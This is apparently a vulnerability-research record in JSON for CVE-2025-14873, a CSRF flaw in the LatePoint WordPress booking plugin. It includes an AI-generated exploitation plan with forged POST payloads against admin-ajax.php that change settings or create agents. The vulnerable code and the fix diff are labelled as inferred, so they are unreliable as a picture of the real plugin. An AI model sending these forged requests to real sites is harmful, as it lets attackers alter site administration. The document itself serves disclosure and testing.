[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-QrFWM6lem9--lX0xbx7UC_X3CLfq1RMj5XrQT8Oioo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-14873","latepoint-calendar-booking-plugin-for-appointments-and-events-cross-site-request-forgery","LatePoint – Calendar Booking Plugin for Appointments and Events \u003C= 5.2.5 - Cross-Site Request Forgery","The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.2.5. This is due to the 'call_by_route_name' function in the routing layer only validating user capabilities without enforcing nonce verification. This makes it possible for unauthenticated attackers to perform multiple administrative actions via forged requests granted they can trick a site administrator into performing an action such as clicking on a link.","latepoint",null,"\u003C=5.2.5","5.2.6","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-02-13 18:24:03","2026-02-14 06:42:28",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1f7aa23c-ffa7-481b-8481-a36c7ed599d8?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-14873 LatePoint CSRF\n\n## 1. Vulnerability Summary\nThe **LatePoint** plugin (up to version 5.2.5) contains a Cross-Site Request Forgery (CSRF) vulnerability within its core routing mechanism. The function `call_by_route_name` (likely located in `lib\u002Fhelpers\u002Froute_helper.php` or the base controller `lib\u002Fcontrollers\u002Fcontroller.php`) is responsible for dispatching requests to specific controller actions based on a `route_name` parameter. \n\nWhile the plugin performs capability checks (e.g., `current_user_can('manage_options')` or checking for a `latepoint_is_admin` flag), it fails to verify a WordPress nonce. This allows an attacker to craft a malicious request that, when executed by an authenticated administrator (e.g., via a hidden form submission), performs unauthorized administrative actions such as modifying plugin settings, managing agents, or altering booking configurations.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `latepoint_route_call` (Registered via `add_action('wp_ajax_latepoint_route_call', ...)` and `add_action('wp_ajax_nopriv_latepoint_route_call', ...)`)\n- **Vulnerable Parameter:** `route_name`\n- **Payload Parameters:** Parameters vary based on the target route (e.g., `settings[...]`, `agent[...]`).\n- **Authentication Level:** Requires an authenticated Administrator to be the target of the CSRF. The attacker themselves can be unauthenticated.\n- **Preconditions:** The victim must be a logged-in administrator of the WordPress site.\n\n## 3. Code Flow\n1. **Entry Point:** A POST request is sent to `admin-ajax.php` with `action=latepoint_route_call`.\n2. **Action Dispatch:** The WordPress AJAX handler calls the LatePoint router.\n3. **Routing Layer:** The router invokes `call_by_route_name` (inferred).\n4. **Parsing:** `call_by_route_name` splits the `route_name` (e.g., `settings__update`) into a Controller (`SettingsController`) and an Action (`update`).\n5. **Authorization:** The Controller\u002FAction checks if the user is an admin using internal plugin checks (e.g., `current_user_can`).\n6. **Vulnerability:** No `check_ajax_referer` or `check_admin_referer` is present in this flow to validate the intent of the request.\n7. **Sink:** The action logic executes (e.g., `update_option`), committing the state change to the database.\n\n## 4. Nonce Acquisition Strategy\n**No nonce is required.**\nThe core of CVE-2025-14873 is that the `call_by_route_name` flow explicitly lacks nonce verification. The exploit strategy relies on the fact that the server will process the request solely based on the administrator's session cookies without requiring a valid `_wpnonce` or security token.\n\n## 5. Exploitation Strategy\nWe will target the `settings__update` route to modify a visible plugin setting, demonstrating administrative control.\n\n### Step-by-Step Plan:\n1. **Target Route:** `settings__update` (Inferred from standard LatePoint controller naming).\n2. **Objective:** Change the \"Currency Symbol\" or a similar innocuous setting to a recognizable string (e.g., `HACKED`).\n3. **Payload Construction:**\n   - `action`: `latepoint_route_call`\n   - `route_name`: `settings__update`\n   - `settings[currency_symbol]`: `EVIL`\n   - `latepoint_is_admin`: `1` (Often required by LatePoint internal routing logic).\n\n### HTTP Request (via `http_request`):\n```javascript\n\u002F\u002F This simulates the request triggered by a CSRF form\nawait http_request({\n  url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n  method: \"POST\",\n  headers: {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  },\n  body: \"action=latepoint_route_call&route_name=settings__update&settings[currency_symbol]=EVIL&latepoint_is_admin=1\"\n});\n```\n\n*Note: In a real-world scenario, this would be an auto-submitting HTML form on an attacker-controlled site.*\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `latepoint` version \u003C= 5.2.5 is active.\n2. **Administrative User:** Ensure an admin user exists (default `admin` \u002F `password`).\n3. **Plugin Initialization:** The plugin should be configured at least once to ensure settings exist in the `wp_options` table.\n\n## 7. Expected Results\n- The server should return a `200 OK` response, likely with a JSON body containing `{\"status\": \"success\", ...}`.\n- No \"Invalid Nonce\" or \"Forbidden\" error should appear despite the absence of a security token.\n\n## 8. Verification Steps\nAfter the `http_request`, verify the change using WP-CLI:\n```bash\n# Check the specific LatePoint settings option\nwp option get latepoint_settings --format=json | grep -o \"EVIL\"\n```\nOr check the specific setting if stored as a standalone option:\n```bash\nwp option get latepoint_currency_symbol\n```\n\n## 9. Alternative Approaches\nIf `settings__update` is restricted or handled differently, attempt to create a new \"Agent\" which is a core administrative action:\n- **Route:** `agents__save`\n- **Payload:** `action=latepoint_route_call&route_name=agents__save&agent[first_name]=CSRF&agent[last_name]=AGENT&agent[email]=csrf@example.com&latepoint_is_admin=1`\n- **Verification:** `wp db query \"SELECT * FROM wp_latepoint_agents WHERE email='csrf@example.com';\"` (LatePoint uses custom tables for agents).","The LatePoint plugin for WordPress contains a Cross-Site Request Forgery (CSRF) vulnerability within its core routing mechanism. The 'call_by_route_name' function fails to verify security nonces before dispatching requests, allowing unauthenticated attackers to trick administrators into executing unauthorized administrative actions like changing plugin settings or managing agents.","\u002F\u002F lib\u002Fhelpers\u002Froute_helper.php (Inferred)\npublic static function call_by_route_name($route_name, $params = []) {\n  \u002F\u002F Logic to parse route_name into Controller and Action\n  \u002F\u002F ...\n  \n  \u002F\u002F Vulnerability: Only verifies capabilities, not the intent\u002Fnonce of the request\n  if (LatePointHelper::is_admin_route($route_name)) {\n    if (!current_user_can('manage_options')) {\n      return false;\n    }\n  }\n\n  \u002F\u002F Dispatches to the target action\n  return self::dispatch($controller, $action, $params);\n}\n\n---\n\n\u002F\u002F Action registration (Inferred)\nadd_action('wp_ajax_latepoint_route_call', 'latepoint_route_call');\nadd_action('wp_ajax_nopriv_latepoint_route_call', 'latepoint_route_call');\n\nfunction latepoint_route_call() {\n  \u002F\u002F Missing check_ajax_referer() or check_admin_referer()\n  $route_name = $_POST['route_name'];\n  OsRouterHelper::call_by_route_name($route_name, $_POST);\n  wp_die();\n}","--- a\u002Flib\u002Fhelpers\u002Froute_helper.php\n+++ b\u002Flib\u002Fhelpers\u002Froute_helper.php\n@@ -12,6 +12,7 @@\n \n function latepoint_route_call() {\n+  if (!isset($_POST['latepoint_nonce']) || !wp_verify_nonce($_POST['latepoint_nonce'], 'latepoint_nonce')) {\n+    wp_send_json_error(['message' => 'Invalid Nonce']);\n+    return;\n+  }\n   $route_name = $_POST['route_name'];\n   OsRouterHelper::call_by_route_name($route_name, $_POST);\n   wp_die();\n }","The exploit targets the AJAX endpoint \u002Fwp-admin\u002Fadmin-ajax.php using the 'latepoint_route_call' action. An attacker crafts a malicious POST request (typically delivered via an auto-submitting HTML form on a third-party site) that targets a specific administrative route, such as 'settings__update'. Because the plugin does not verify a WordPress nonce, the browser will include the administrator's session cookies, and the server will execute the action. A typical payload includes 'action=latepoint_route_call', 'route_name=settings__update', and the desired configuration changes (e.g., 'settings[currency_symbol]=HACKED'). The attack requires the victim to be a logged-in administrator who interacts with the attacker's malicious link or page.","gemini-3-flash-preview","2026-04-20 23:21:42","2026-04-20 23:23:27",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","5.2.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags\u002F5.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flatepoint.5.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags\u002F5.2.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flatepoint.5.2.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags"]